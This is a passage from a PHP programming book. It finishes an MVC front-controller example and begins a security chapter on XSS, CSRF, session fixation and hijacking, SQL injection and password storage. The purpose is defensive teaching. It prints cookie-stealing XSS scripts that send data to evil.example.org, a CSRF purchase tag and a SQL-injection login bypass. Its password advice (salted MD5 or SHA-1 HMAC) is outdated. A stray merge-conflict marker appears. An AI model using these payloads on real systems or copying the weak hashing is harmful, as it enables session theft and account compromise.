When calling the /photos/dshafik/5584010786/in/set-72157626290864145 Flickr
URL, it will give us:
array(4) {
["user"]=>
string(7) "dshafik"
["photoId"]=>
string(10) "5584010786"
["groupType"]=>
string(3) "set"
["groupId"]=>
string(17) "72157626290864145"
}
Now that we have a router, we can write a very simple front controller. To automatically include the correct models and views, the controller requires our models and
views to follow a specific naming convention. For models, we have a model with
the same name as our controller; for example:
Design Patterns
chapter_04/Controller.php
class Photos_Controller {
/**
* @var RouterAbstract
*/
protected $router = false;
/**
* Run our request
*
* @param string $url
*/
public function dispatch($url, $default_data = array())
{
try {
if (!$this->router) {
throw new Exception("Router not set");
}
$route = $this->router->getRoute($url);
$controller = ucfirst($route['controller']);
$action = ucfirst($route['action']);
unset($route['controller']);
unset($route['action']);
// Get our model
$model = $this->getModel($controller);
$data = $model->{$action}($route);
$data = $data + $default_data;
// Get our view
$view = $this->getView($controller, $action);
echo $view->render($data);
} catch (Exception $e) {
try {
if ($url != '/error') {
$data = array('message' => $e->getMessage());
$this->dispatch("/error", $data);
} else {
throw new Exception("Error Route undefined");
167
168
PHP Master: Write Cutting-edge Code
}
} catch (Exception $e) {
echo "<h1>An unknown error occurred.</h1>";
}
}
}
/**
* Set the router
*
* @param RouterAbstract $router
*/
public function setRouter(RouterAbstract $router)
{
$this->router = $router;
}
/**
* Get an instantiated model class
*
* @param string $name
* @return mixed
*/
protected function getModel($name)
{
$name .= '_Model';
$this->includeClass($name);
return new $name;
}
/**
* Get an instantiated view class
*
* @param string $name
* @param string $action
* @return mixed
*/
protected function getView($name, $action)
{
$name .= '_' .$action. 'View';
$this->includeClass($name);
Design Patterns
return new $name;
}
/**
* Include a class using PEAR naming scheme
*
* @param string $name
* @return void
* @throws Exception
*/
protected function includeClass($name)
{
$file = str_replace('_', DIRECTORY_SEPARATOR, $name) . '.php';
if (!file_exists($file)) {
throw new Exception("Class not found!");
}
require_once $file;
}
}
As a requirement of our controller, we want both a controller and an action
param, so our URL needs to change to be a little more explicit:
/photos/getPhoto/dshafik/5584010786/in/set-72157626290864145
If we again load our photo URL, we’ll magically (not really) see:
<h1>Brooke in the Woods</h1>
<img src="http://farm6.static.flickr.com/5142/5584010786_95a4c15
e8a_z.jpg" width="427" height="640">
The Model
In our controller, we implemented a getModel() method; let’s take a look at what’s
going on beneath the code.
We’ve decided, for our MVC structure, that we’ll have one model per controller,
with a method for each action. In the case of our URL, we have a photos controller
and a getPhoto() action. So, we will define a Photos_Model class with a getPhoto()
method:
169
170
PHP Master: Write Cutting-edge Code
chapter_04/Model.php
class Photos_Model {
public function getPhoto($options)
{
// Retrieve the photo's URL, from a DB, by constructing a➥
file path, etc
// This is hard-coded
return array(
'title' => 'Brooke in the Woods',
'width' => 427,
'height' => 640,
'url' => 'http://farm6.static.flickr.com/5142/➥
5584010786_95a4c15e8a_z.jpg',
);
}
}
Every model function must return an array of data. This data is then used to render
the view. Not every function retrieves data, however. Let’s take a look at an example
error model:
chapter_04/ErrorModel.php
class Error_Model {
public function showError($data)
{
$config = Registry::get('site-config');
$factory = new Log_Factory();
$log = $factory->getLog($config['log']['type'], $config['log']);
$log->add($data['message']);
return array();
}
}
In this case, the model simply logs (using our Registry and Log_Factory!), and
returns an empty array.
Design Patterns
The View
Our views are equally simple: a class named after both our controller and action—in
this case, Photos_GetPhotoView. Each view class has a simple render() method
that takes the data and displays the relevant page:
chapter_04/View.php
class Photos_GetPhotoView {
public function render($data)
{
$html = '<h1>%s</h1>' . PHP_EOL;
$html .= '<img src="%s" width="%s" height="%s">' . PHP_EOL;
$return = sprintf($html, $data['title'], $data['url'],➥
$data['width'], $data['height']);
return $return;
}
}
In this case, we use a simple sprintf() call to template our HTML. Depending on
your application, you could throw in any template engine, such as Twig,3 Smarty,4
or Savant.5
By using basic PHP arrays as the interchange format between controller and model,
and then model and view, we are allowing our model—the heart of our business
logic—to do whatever is necessary (including refactoring or rewriting it) without
breaking our view, so long as the data structure contract is honored.
In light of this, you can see that the MVC pattern is really about creating standards,
conventions, and contracts between the different layers of your application.
Pattern Formation
It has been said, when it comes to computer programming, that no problem is a new
problem—someone else has solved it already. This is especially so on the Web! The
design pattern is the codification of this concept; crafted over many years via trial
3
http://twig.sensiolabs.org/
http://www.smarty.net/
5
http://phpsavant.com/
4
171
172
PHP Master: Write Cutting-edge Code
and error, design patterns are the consensus of best practices for many common
problems.
Regardless, don’t assume that design patterns are the be-all and end-all. There are
many nuances to employing them: some forced by technical limitations based on
the programming language being used; others by the specifics of the task at hand.
But they are by their definition conceptual and language-agnostic, and you will find
them of use no matter what language you write code in—but especially PHP.
Chapter
5
Security
As more people use and depend on technology, more users attempt to manipulate
it. All technologies have some level of capability for misuse in the hands of those
with ill intentions. This is illustrated well by the high-profile security compromises
of the Epsilon unit of Alliance Data Systems,1 Sony’s PlayStation Network,2 and
Google’s Gmail service.3
The purpose of this chapter is to show you how to secure your PHP applications
from common attack vectors, or specific types of vulnerabilities that attackers can
exploit. This chapter is not intended to be a comprehensive guide to security principles or practices; like technology, these subjects are in a constant state of development and evolution. Instead, the focus of the chapter will be on security issues that
are commonly seen in real-world PHP applications, and how to avoid them.
1
http://www.reuters.com/article/2011/04/04/idUSL3E7F42DE20110404
http://blog.us.playstation.com/2011/04/26/update-on-playstation-network-and-qriocity/
3
http://www.reuters.com/article/2011/06/01/us-google-hacking-idUSTRE7506U320110601
2
174
PHP Master: Write Cutting-edge Code
Be Paranoid
“Now and then, I announce ‘I know you’re listening’ to empty rooms.”4
Many attack vectors have a central cause: trusting tainted data—data introduced
into the system by the user. The normal use case for an application may only involve
a web browser and a user with a relatively limited knowledge of the Internet and
how it works. However, it only takes one malicious user with knowledge that surpasses your own to compromise sensitive portions of your application source code,
or the data it exposes.
In some cases, we trust user data because we don’t realize it’s provided by the user.
For example, you might not think that the variable $_SERVER['HTTP_HOST'] is usersupplied. The name of the $_SERVER superglobal implies that the data it contains
is provided by the web server, or is specific to the server environment.
However, the value of the $_SERVER['HTTP_HOST'] variable is provided by the Host
header of the incoming application request, which is provided by the
browser—essentially, the user. This trait alone makes it dangerous to trust. Users
can control a lot more data than most people think, so you should avoid trusting
any of it.
In short, when dealing with matters of application security, it’s better to be overly
cautious than not careful enough. Always assume the worst-case scenario. As the
old saying goes, “It’s only paranoia if they aren’t out to get you.” When it comes to
exploiting your applications, they are.
Filter Input, Escape Output
The phrase filter input, escape output—sometimes abbreviated to FIEO—has become
a mantra for security in PHP applications. It refers to a practice used to avoid situations where user input can be interpreted to have semantic meaning beyond the
simple data it represents.
These types of situations are a common source of several attack vectors. They contributed to the development of the magic quotes PHP configuration settings intro-
4
http://xkcd.com/525/
Security
duced in PHP 2 and deprecated in PHP 5.3.5 These settings were a technical measure
implemented in an attempt to solve a social problem: the lack of education about
security vulnerabilities in the general population of junior-level PHP developers.
The issue with this approach is that it makes an assumption about how data is used,
which can only be determined on a case-by-case basis. Is it being stored in a database? Is it being included in the output sent back to the user? Each of these scenarios
requires data to be modified in a different way before it can be used for its intended
purpose.
FIEO presents the idea that the same general approach must be applied to an application’s input and output: modifying that data so it can never be interpreted as anything other than data, and therefore can’t affect the application’s functionality.
Filtering and Validation
Filtering, also sometimes called sanitization, is the process of removing unwanted
characters from user input, and modifying it to make it suitable for a particular use.
Validation does not modify user input; it merely indicates whether or not it conforms
to a set of rules, such as those dictating the format of an email address. The filter
extension provides an implementation of both of these for handling multiple common
types of data. Here are examples of performing both processes on an alleged email
address:
chapter_05/filter.php
$email_sanitized = filter_var($email, FILTER_SANITIZE_EMAIL);
$email_is_valid = filter_var($email, FILTER_VALIDATE_EMAIL);
For validating with some simpler, more general patterns, the ctype extension
provides a few functions.6 Some of these include the following:
5
For more on magic quotes, visit Wikipedia’s page on the subject:
http://en.wikipedia.org/wiki/Magic_quotes
6
http://php.net/ctype
175
176
PHP Master: Write Cutting-edge Code
chapter_05/ctype.php
$is_alpha = ctype_alpha($input);
$is_integer = ctype_digit($input);
$is_alphanumeric = ctype_alnum($input);
Finally, for more advanced filtering and validation, the PCRE (Perl-Compatible
Regular Expression) extension7 is a fairly powerful and flexible tool. It requires
knowledge of regular expressions, but the extension’s manual section includes
everything you need to know to get started. Here are examples to filter and validate
alphanumeric strings:
chapter_05/preg.php
$input_sanitized = preg_replace('/[^A-Za-z0-9]/', '', $input);
$input_is_valid = (bool) preg_match('/^[A-Za-z0-9]$/', $input);
For an excellent reference on regular expressions, check out Mastering Regular Expressions by Jeffrey E.F. Friedl (Sebastopol: O’Reilly, 2006).8
Other methods of filtering input that are specific to the intended usage of that input
will be covered later in this chapter. Escaping output is covered shortly.
Cross-site Scripting
For cross-site scripting—commonly abbreviated as XSS—the attack vector targets
an area where a user-supplied variable is included in application output, but not
properly escaped. This allows an attacker to inject a client-side script of their choice
as part of that variable’s value. Here’s an example of code vulnerable to this type
of attack:
<form action=”<?php echo $_SERVER['PHP_SELF']; ?>”>
<input type=”submit” value=”Submit” />
</form>
7
8
http://php.net/pcre
http://oreilly.com/catalog/9780596528126
Security
The Attack
This particular example requires that the AcceptPathInfo Apache configuration
setting9 (or the equivalent for your particular web server) is enabled. This is commonly the case in web server configurations that include support for languages like
PHP. This setting causes the web server to return a particular page when the client
requests one that’s prefixed with the same path, as opposed to matching it exactly.
For example, let’s say that a page exists at /test.php and the client makes a request
for /test.php/foo. If AcceptPathInfo is enabled, the web server will resolve the request to /test.php; if it’s disabled, the web server will conclude that no page exists
at that location and return a 404 Not Found response.
This is significant because when AcceptPathInfo is enabled, it allows an attacker
to append arbitrary data to the path of the resource they’re requesting, while not
preventing the web server from resolving that path to the same PHP script. In the
context of this example, let’s say that an attacker decides to inject this client-side
code:
<script>
new Image().src = 'http://evil.example.org/steal.php?cookies=' +
encodeURIComponent(document.cookie);
</script>
This code takes advantage of the fact that browsers allow embedding of images
hosted on different domains and enable the creation of image objects in client-side
scripts. The code does this to transmit cookies for the current user to a remote script
that the attacker has put into place to receive the data, most likely to hijack the
user’s session—more on that later.
To inject this client-side script into the page, the attacker has to surround it with
additional markup to close the original <form> tag, and then make that <form> tag’s
closing quote and bracket part of another tag. In many cases, this will cause malformed markup, but that’s only a concern if it affects the ability of the browser to
process the markup as intended, which is rare. So the actual code being injected
would look as such:
9
http://httpd.apache.org/docs/2.0/mod/core.html#acceptpathinfo
177
178
PHP Master: Write Cutting-edge Code
“>
<script>
new Image().src = 'http://evil.example.org/steal.php?cookies=' +
encodeURIComponent(document.cookie);
</script>
<span class=”
Technically speaking, the attacker has to URL-encode the client-side script as well
before appending it to the URL. This may not always be necessary, but it depends
on the web browser and web server in question. After URL-encoding the code to be
injected, and appending it to the original URL, the attacker has their final URL:
/test.php/%5C%22%3E%3Cscript%3Enew+Image%28%29.➥
src%3D%5C%27http%3A%2F%2Fevil.example.org%2➥
Fsteal.php%3Fcookies%3D%5C%27%2BencodeURIComponent➥
%28document.cookie%29%3B%3C%2Fscript%3E%3Cspan+class%3D%5C%22
This URL would result in the following HTML output using the original PHP form
code:
<form action=”/test.php“>
<script>
new Image().src = 'http://evil.example.org/steal.php?cookies=' +
encodeURIComponent(document.cookie);
</script>
<span class=””>
<input type=”submit” value=”Submit” />
</form>
At this point, all the attacker has to do is share the URL with users and convince
them to click it. Assuming one of those users has a session on that website, the attacker can then hijack it.
The Fix
Compared to the attack itself, the fix is surprisingly simple: escape output from PHP
code to prevent the attacker from being able to inject their code in the first place.
This looks like the following:
Security
<form action=”<?php echo htmlentities($_SERVER['PHP_SELF']); ?>”>
<input type=”submit” value=”Submit” />
</form>
With the addition of the htmlentities() call, the attacker’s URL now generates
this output:
<form action=”/test.php<script>new
Image().src=\http://evil.example.org/steal.php?cookies=\➥
+encodeURIComponent(document.cookie);</script>”>
<input type=”submit” value=”Submit” />
</form>
This could prevent the form submission from working as intended, but it does
prevent an attacker from compromising the form. The following code shows examples
that may work as acceptable substitutes for $_SERVER['PHP_SELF']; these will
prevent such attacks from breaking the form’s functionality if AcceptPathInfo
cannot be disabled:
chapter_05/php_self.php
$_SERVER['SCRIPT_NAME']
str_replace($_SERVER['DOCUMENT_ROOT'], '', $_SERVER➥
['SCRIPT_FILENAME'])
Online Resources
There are many resources available if you’re interested in researching cross-site
scripting a bit further. Chris Shiflett’s site is a haven of information, and ha.ckers.org
provides access to a handy cheat sheet on the ins and outs of filter evasion. Or, head
to one of the following sites:
■ http://ha.ckers.org/xss.html
■ http://shiflett.org/articles/cross-site-scripting
■ http://shiflett.org/articles/foiling-cross-site-attacks
■ http://shiflett.org/blog/2007/mar/allowing-html-and-preventing-xss
■ http://seancoates.com/blogs/xss-woes
■ http://phpsec.org/projects/guide/2.html#2.3
■ https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%2
179
180
PHP Master: Write Cutting-edge Code
Cross-site Request Forgery
Let’s say that an attacker wants an expensive product from a popular online storefront
without paying for it. Instead, they want to place the debt on an unsuspecting victim.
Their weapon of choice: a Cross-site Request Forgery, often abbreviated to CSRF.
The purpose of this type of attack is to have a victim send an HTTP request to a
specific website, taking advantage of the victim’s established identity with that
website.
This type of attack isn’t limited to online shopping as used in this section; it can
be applied to any situation that involves the creation or modification of sensitive
data.
The Attack
Let’s say that the victim has an account with the store website receiving the attacker’s
request, and has already logged into that website. We’ll assume that their account
information includes a default billing address, shipping address, and stored payment
method. The store might keep this information to allow a user to conveniently
submit an order with a single click.
This feature involves two components. The first is an HTML form that appears next
to a product on a page, and is as follows:
<form action=”http://example.com/oneclickpurchase.php”>
<input type=”hidden” name=”product_id” value=”12345” />
<input type=”submit” value=”1-Click Purchase” />
</form>
Note that this form doesn’t specify a method, meaning that the web browser will
default to using GET when the form is submitted. This will be significant later when
the attack is executed.
The second component of the one-click purchase feature is a PHP script used to
process submissions from the HTML form, which might look as follows:
<?php
// ⋮
Security
session_start();
$order_id = create_order($_SESSION['user_id']);
add_product_to_order($order_id, $_GET['product_id'], 1);
complete_order($order_id);
$_SESSION['user_id'] has already been established by the victim being logged in.
$_GET['product_id'] comes from the form submission. $_REQUEST could also have
been used in place of $_GET here, as $_REQUEST combines data from $_GET, $_POST,
and $_COOKIE.10
Cookies are specific to a domain. Once a website sets a cookie, the web browser
will include it in all subsequent requests to that website until either the cookie expires, or the web browser session ends (that is, the web browser is closed). This
includes requests made by other websites for assets hosted on that particular website—another critical component of the attack, because it allows the attacker to take
advantage of the victim being logged in to that targeted website.
To commit the forgery, the attacker shares a URL in the same way they might if executing an XSS attack. This URL could easily reference a page with an XSS vulnerability that the attacker has exploited to make it more difficult to trace it back to
them. This URL’s purpose is to make the attacker’s desired request when the victim
visits that URL. To make a request equivalent to submitting the form shown earlier,
the attacker would merely need the page to display this markup:
<img src=”http://example.com/oneclickpurchase.php?➥
product_id=12345” />
This image will, of course, appear broken because the PHP script used to process
the form submission doesn’t return image data. Even if the victim realizes this,
however, the request has already been made and the damage is done. This markup
causes the browser to automatically make an HTTP request like this one on the
victim’s behalf, in order to download and render the requested “image”:
GET /oneclickpurchase.php
Host: example.com
Cookie: PHPSESSID=82551688a6333d57647b3ae8807de118
10
http://php.net/manual/en/reserved.variables.request.php
181
182
PHP Master: Write Cutting-edge Code
The cookie shown here was set when the victim logged in, and it is tied to that
session on this website. Once they’ve logged in, the session data contains their user
identifier. At this point, the “image” request may as well be a form submission made
by the victim.
You might ask how shipping a product to the victim’s default address is useful if
that address is inaccessible to the attacker. Well, if a website makes falsifying a
product order on an account this simple, it’s quite likely that the same is true in
changing the default shipping address on an account. The attacker could use the
same technique to change the victim’s shipping address before executing the attack,
fulfilling their goal of obtaining a product at the expense of another.
The Fix
The use of the GET method by the form in this example violates section 9.1.1 of RFC
2616,11 the specification for the HTTP protocol, which states the following: “... the
convention has been established that the GET and HEAD methods SHOULD NOT
have the significance of taking an action other than retrieval. These methods ought
to be considered safe.” In other words, it should be impossible to use GET on a resource and cause data creation, modification, or deletion.
There are a few ways to address this vulnerability, but the primary one is to have
the form use POST instead of GET. GET requests can be made for scripts, stylesheets,
and images, all on a domain other than the one serving the current page. They also
aren’t obligated to return the type of resource they purport to be. Execution of POST
requests by web browsers, on the other hand, is limited to form submissions and
asynchronous requests, the latter of which is restricted by the same origin policy.
(You’ll remember these were discussed in the section called “Ajax and Web Services”
in Chapter 3.)
The modified form will look like this:
<form method=”post” action=”http://example.com/oneclickpurchase.➥
php”>
<input type=”hidden” name=”product_id” value=”12345” />
<input type=”submit” value=”1-Click Purchase” />
</form>
11
http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html#sec9.1.1
Security
This change doesn’t preclude the possibility that an attacker might duplicate this
HTML on another website. When a victim submits the form, the request will include
their session cookie for the domain in the form action.
To address this, you can take advantage that a normal user will view the form before
submitting it by including a field with a random value, known as a nonce or CSRF
token. The token will also be stored in the user’s session, and compared to the form
value when the form is submitted to confirm that the values are identical. The
modified script to output the form looks as follows:
chapter_05/csrf.php
<?php
session_start();
if ($_POST && $_POST['token'] == $_SESSION['token']) {
// process form submission
} else {
$token = uniqid(rand(), true);
$_SESSION['token'] = $token;
?>
<form method=”post” action=”http://example.com/➥
oneclickpurchase.php”>
<input type=”hidden” name=”token” value=”<?php echo $token; ?>” />
<input type=”hidden” name=”product_id” value=”12345” />
<input type=”submit” value=”1-Click Purchase” />
</form>
<?php
}
One last method is effective, but has a larger impact on the user experience. When
a sensitive action like making a purchase is about to cause a change in data, display
a page explaining the action about to be taken, and prompt the user to re-authenticate
with their credentials. This prevents the attacker from automatically carrying out
actions on the victim’s behalf.
Online Resources
There is plenty of online material to enlighten you on CSRF, and, again, Chris
Shiflett’s site has some detailed articles. A quick Google search should bring up
more than enough information for you, but it’s definitely worth visiting these links:
■ http://shiflett.org/articles/cross-site-request-forgeries
183
184
PHP Master: Write Cutting-edge Code
■ http://shiflett.org/articles/foiling-cross-site-attacks
■ http://phpsec.org/projects/guide/2.html#2.4http://phpsec.org/projects/guide/2.html#2.4
■ https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
Session Fixation
As just demonstrated, the user session is a frequent target of attack vectors. This
unique point of identification between a potential victim and a target website has
the potential to facilitate several types of attacks. There are three methods that an
attacker can use to obtain a valid session identifier. In order of difficulty, they are:
1. Fixation
2. Capture
3. Prediction
Fixation involves forcing a given website to use a session identifier provided by
the attacker. Capture is discussed further in a later section. Prediction requires that
the session identifier be predictable enough so that it can be generated by an attacker;
fortunately, PHP’s default method for generating session identifiers provides enough
randomness to make prediction fairly difficult.
The Attack
Executing a session fixation attack is as simple as having a user click a link or submit
a form that includes a session identifier. Links can be obfuscated to some extent
using HTML meta tags or PHP scripts that include an HTTP Location header in
their output to redirect the victim to the final destination. Here’s an example of
such a link:
<a href=”http://example.com/login.php?PHPSESSID=12345”>Click here➥
</a>
The referenced resource could display a form used for authenticating the victim’s
identity. At that point, that identity would be tied to the session and any requests
made using it. The attacker could view a different page on the same site using that
session identifier, and have access to any data associated with the victim’s account.
Security
The Fix
The solutions to preventing this attack depend on informed usage of PHP’s user
session functionality, including its runtime configuration.
First, check the state of the following configuration settings in your php.ini file:
session.use_cookies
This causes the session identifier to be persisted
between requests using cookies. It should either
not be set at all, or explicitly set to 1, its default
value.
session.use_only_cookies
This prevents the session identifier from being
persisted or overridden by other methods of introducing data into the request, such as query string
and POST parameters. It should be explicitly set
to 1.
session.use_trans_sid
This causes PHP to automatically modify its output to persist the session identifier in links and
forms. It should be explicitly set to 0.
url_rewriter.tags
When session.use_trans_id is enabled, it dictates what HTML tags have their values rewritten
to include the session identifier. It should be explicitly set to the empty string to prevent session.use_trans_id from having an effect if accidentally enabled.
session.name
In situations where the session identifier can be
persisted in query string and form parameters, the
parameter name most often used by attackers is
“PHPSESSID”—the default value of this setting.
Changing this to be more obscure can make it
slightly more difficult to execute session fixation
attacks, particularly in cases where applications
don’t grant sessions to unauthenticated users, or
where attackers are using automated tools that
assume this setting has its default value.
185
186
PHP Master: Write Cutting-edge Code
Any sensitive actions, such as authenticating a user, should be accompanied by a
call to the session_regenerate_id() function. This will change the session identifier while maintaining association with the existing data in the session. Thus, if
a victim logs in and this function is called immediately before redirecting the user,
their session identifier will differ to the one that the attacker is attempting to have
them use.
Online Resources
Tightening session security is always a good technique for a programmer to continually improve upon, and there are online resources at your disposal. The Open Web
Application Security Project has a helpful page on session fixation attacks, among
other websites:
■ http://shiflett.org/articles/session-fixation
■ http://phpsec.org/projects/guide/4.html#4.1
>>>>>>> .merge-right.r8880
■ http://phpsec.org/projects/guide/4.html#4.1
■ https://www.owasp.org/index.php/Session_fixation
Session Hijacking
The phrase session hijacking can be a bit confusing, because it’s used to describe
two things:
■ any type of attack that results in an attacker gaining access to a session associated
with a victim’s account on a website, regardless of how that access is obtained
■ the specific type of attack that involves capturing an established session identifier, as opposed to obtaining a session identifier through fixation or prediction
This section will focus on the latter meaning.
There are numerous methods of capturing a session identifier. They are generally
classified by whatever medium is used to persist the session identifier between requests, as capturing all data persisted by that medium usually becomes the goal of
the attack.
Security
The Attack
The configuration measures used to prevent session fixation attacks can also contribute to preventing session hijacking attacks, because they limit how session
identifiers are persisted. To illustrate this, let’s look at an example of markup that
could hypothetically be injected by an attacker via an XSS vulnerability:
<script type=”text/javascript”>
var links = document.getElementsByTagName(“a”);
var query = [];
var i;
for (i = 0; i < links.length; i++) {
query.push(links[i].getAttribute(“href”);
}
var input = document.getElementsByTagName(“input”);
var form = [];
for (i = 0; i < input.length; i++) {
if (input[i].getAttribute(“type”) == “hidden”) {
form.push(input[i].getAttribute(“name”)+“=”+input[i].➥
getAttribute(“value”));
}
}
new Image().src = 'http://evil.example.org/steal.php?query=' +
encodeURIComponent(query.join(“|”)) + “&form=” +
encodeURIComponent(form.join(“|”)) + “&cookie=” +
encodeURIComponent(document.cookie);
</script>
This code builds on the earlier example from the section called “Cross-site Scripting”
by also capturing link URLs and name-value pairs for hidden form fields—likely
sources for a session identifier if your PHP configuration allows it to be persisted
in those areas.
The Fix
Preventing attacks that target cookies is regrettably not as simple as changing a few
configuration settings. There are no cure-all methods, but there are ways to make
such attacks more difficult.
One simple method is to enable the session.cookie_httponly PHP setting. Regrettably, this setting is supported by a limited number of browsers, but for those that
do support it, it prevents cookie data from being accessible to client-side scripts.
187
188
PHP Master: Write Cutting-edge Code
The alternative tackles the problem from a different angle: it assumes that the session
identifier will be captured. The focus is on invalidating that session based on other
criteria about the request to which the attacker may not have access.
The first criterion that many developers think of is the user’s public-facing IP address.
However, this approach is riddled with problems: multiple users using the same
connection and thus the same IP address, use of proxy servers obscuring user IP
addresses, internet service providers dynamically allocating IP addresses that have
the potential to change between requests, attackers spoofing or falsifying IP addresses,
and so on. In short, it’s not a good measure to rely upon.
What must be used instead are request headers whose values don’t vary between
requests for the same user. These headers are optional, so they can only be used for
this purpose when they’re present. They’re reliable because if a particular browser
sends them for a request, chances are good it will also include and maintain the
same values for them in subsequent requests. Table 5.1 shows headers that generally
maintain a consistent value across requests and the PHP variables that hold them.
Table 5.1. Headers whose values don’t vary between requests
Header Name
PHP Variable
Accept-Charset
$_SERVER['HTTP_ACCEPT_CHARSET']
Accept-Encoding
$_SERVER['HTTP_ACCEPT_ENCODING']
Accept-Language
$_SERVER['HTTP_ACCEPT_LANGUAGE']
User-Agent
$_SERVER['HTTP_USER_AGENT']
Code to persist and check against one of these values looks as follows:
chapter_05/session_hijacking.php
// Session hasn't been started yet, persist the header values
if (!isset($_COOKIE[session_name()])) {
session_start();
$_SESSION['HTTP_USER_AGENT'] = $_SERVER['HTTP_USER_AGENT'];
// Session has started, check the persisted values against the➥
current request
} else {
session_start();
if ($_SESSION['HTTP_USER_AGENT'] != $_SERVER['HTTP_USER_AGENT']) {
Security
// Force the user to re-authenticate
}
}
Online Resources
Again, Chris Shiflett’s site and the Open Web Application Security Project provide
an excellent background in how to tackle session hijacking. Further reading can be
found here:
■ http://shiflett.org/articles/session-hijacking
■ http://shiflett.org/articles/the-truth-about-sessions
■ http://phpsec.org/projects/guide/4.html#4.2
■ https://www.owasp.org/index.php/Session_hijacking_attack
SQL Injection
The nature of this type of vulnerability relates back to the section called “Filter Input,
Escape Output”. In principle, SQL injection is very similar to XSS in that the object
of the attack is to make the application interpret user input as having meaning
beyond the data it represents. With XSS, the intent is to have that input executed
as client-side code; with SQL injection, the goal is for input to be interpreted as an
SQL query or part of one.
The Attack
Let’s say that an attacker wants to find out where a victim lives. This information
is associated with the victim’s account on a particular website, but viewing access
is restricted to users of the victim’s choosing which, naturally, excludes the attacker.
The attacker knows the username of the victim, however, and tries to gain access
to the victim’s account for their street address. Source code to log a user into this
website could be as follows:
if ($_POST) {
$pdo = new PDO('...');
$query = 'SELECT user_id FROM users WHERE username = “' .➥
$_POST['username'] . '” AND password = “' . $_POST➥
['password'] . '”';
$result = $pdo->query($query);
189
190
PHP Master: Write Cutting-edge Code
if ($user_id = $result->fetchColumn()) {
session_start();
$_SESSION['user_id'] = $user_id;
// User is logged in, redirect to a different page
} else {
// Invalid login credentials, display an error
}
}
The issue with this code is that the form input is unfiltered. As such, anything that
the attacker enters becomes part of the query, whether it’s a literal string value or
a query clause. The attacker in this case is trying to work around the requirement
to supply a correct value for the password. Consider this value being entered in the
username field of the login form:
victim_username” --
The resulting query constructed by the login code is this:
SELECT user_id FROM users WHERE username = “victim_username” --”➥
AND password = “...”
The -- injected here is the SQL-92 operator to denote the start of a comment. As
such, everything up to the first newline or (in this case) the end of the query is ignored when the query is executed, leaving the username specification as the only
expression in the query’s WHERE clause. The query would return a single row, the
one associated with the victim’s account, and the application would behave as
though the victim had just logged in. The attacker’s goal has been accomplished:
logging in as that user without specifying their password.
The Fix
SQL injection vulnerabilities are a large contributor to the FIEO mantra of web application security. The fix for this attack is simple: use prepared statements when
executing queries containing parameters for which user input is substituted. This
ensures that the parameter values are properly quoted to prevent user input from
being interpreted as SQL. To secure the original code, this segment must be changed:
Security
$query = 'SELECT user_id FROM users WHERE username = “' .
$_POST['username'] . '” AND password = “' . $_POST['password'] .➥
'”';
$statement = $pdo->query($query);
The more secure version using prepared statements is:
chapter_05/sql_injection.php
$query = 'SELECT user_id FROM users WHERE username = ? AND➥
password = ?';
$statement = $pdo->prepare($query);
$statement->execute(array($_POST['username'], $_POST['password']));
The prepare() method of the PDO instance returns a prepared statement in the
form of a PDOStatement instance. That statement’s execute() method accepts an
array of parameter values where the position of a value within the array corresponds
to the position of a ? placeholder for that value within the query. PDO automatically
handles quoting parameter values that are specified this way.
There is still a security issue with the above query; this will be covered in the section
called “Storing Passwords”.
Online Resources
For more on SQL injection, you can follow up through these links:
■ http://shiflett.org/articles/sql-injection
■ http://phpsec.org/projects/guide/3.html#3.2
■ urihttps://www.owasp.org/index.php/SQL_Injection
Storing Passwords
In cases where a web application does properly handle user input in database
queries, more extensive means are required for an attacker to access a user’s account.
In general, this involves obtaining the victim’s credentials in order to access their
data.
One method of accomplishing this is breaking into the database server used by the
web application. Depending on what database server (and which version) you’re
191
192
PHP Master: Write Cutting-edge Code
using, how the server is configured, and so on, there are any number of ways to
compromise it. Truth be told, the topic is likely to take several books to cover. For
the purposes of this section, however, the attacker’s method of accessing the database
is moot; we’re assuming they’ve already succeeded. Our goal is to minimize the
amount of damage they can do at this point.
The Attack
Having accessed the database server, one potential action the attacker can take is
to download all user account data. If passwords are stored as a user would log in
to the web application, the attacker has all the information required to impersonate
any of the application’s users at that point. Recall the last query example from the
previous section:
$query = 'SELECT user_id FROM users WHERE username = ? AND➥
password = ?';
$statement = $pdo->prepare($query);
$statement->execute(array($_POST['username'], $_POST['password']));
Even using prepared statements to prevent SQL injection attacks, this query is still
insecure because it assumes that passwords are stored with no modification. If an
attacker gains access to the username and password string, they can access the victim’s account.
The Fix
In order to prevent this, passwords must be stored in a modified form. Ideally, this
form would make it impossible for the attacker to convert that modified form back
into an original password string.
Some online resources may suggest converting original password strings to MD5
hashes. Hashing is simply a way of encrypting a data type such as a password string.
If the previous code sample were modified to hash the password using an MD5
hash, it might read as follows:
Security
$query = 'SELECT user_id FROM users WHERE username = ? AND➥
password = ?';
$statement = $pdo->prepare($query);
$statement->execute(array($_POST['username'], md5($_POST➥
['password'])));
Notice the addition of the md5() function call on the last line? The problem with
this approach is that MD5 hashes are relatively easy to recognize: they are 32 characters long and are composed of hexadecimal digits (0-9 and a-f). It’s possible to
use rainbow tables,12or precomputed tables containing possible password strings
and their associated hashes, to look up an obtained password hash for the original
password on which that hash was based. Thus, this approach is better, but still relatively insecure.
In order to make it difficult—let alone impossible—for the attacker to take advantage
of a victim’s username and password hash, the hashing algorithm must be modified
so that the application source code is necessary to discover that modification.
In this case, the modification we’re going to apply is called salting. It involves
adding a string (called a salt) to the password string before applying the hashing
algorithm to it. This prevents rainbow tables from being used to reverse the hashing
algorithm without knowing what the salt is. Here’s an example of what code that
uses salting might look like:
chapter_05/passwords.php
$salt = '378570bdf03b25c8efa9bfdcfb64f99e';
$hash = hash_hmac('md5', $_POST['password'], $salt);
$query = 'SELECT user_id FROM users WHERE username = ? AND➥
password = ?';
$statement = $pdo->prepare($query);
$statement->execute(array($_POST['username'], $hash));
Here, the function hash_hmac() is used to generate an HMAC value for the password.
This function uses a particular hashing algorithm in conjunction with a string to
hash and a salt to use. See the return value of the hash_algos() function for which
hashing algorithms your server supports.
12
http://en.wikipedia.org/wiki/Rainbow_table
193
194
PHP Master: Write Cutting-edge Code
With the increased computing capacity of hardware available to the average consumer, the MD5 algorithm has become less ideal for this purpose. Depending on
their availability on your server, consider using the SHA-1 algorithm or, preferably,
the SHA-256 algorithm instead.
At this point, the attacker must know that the modified password they have is an
HMAC, what hashing algorithm was used to generate it, and what salt was used.
Even if the attacker gains access to this information, it would be necessary to have
to execute the algorithm on random strings until the attacker found the one that
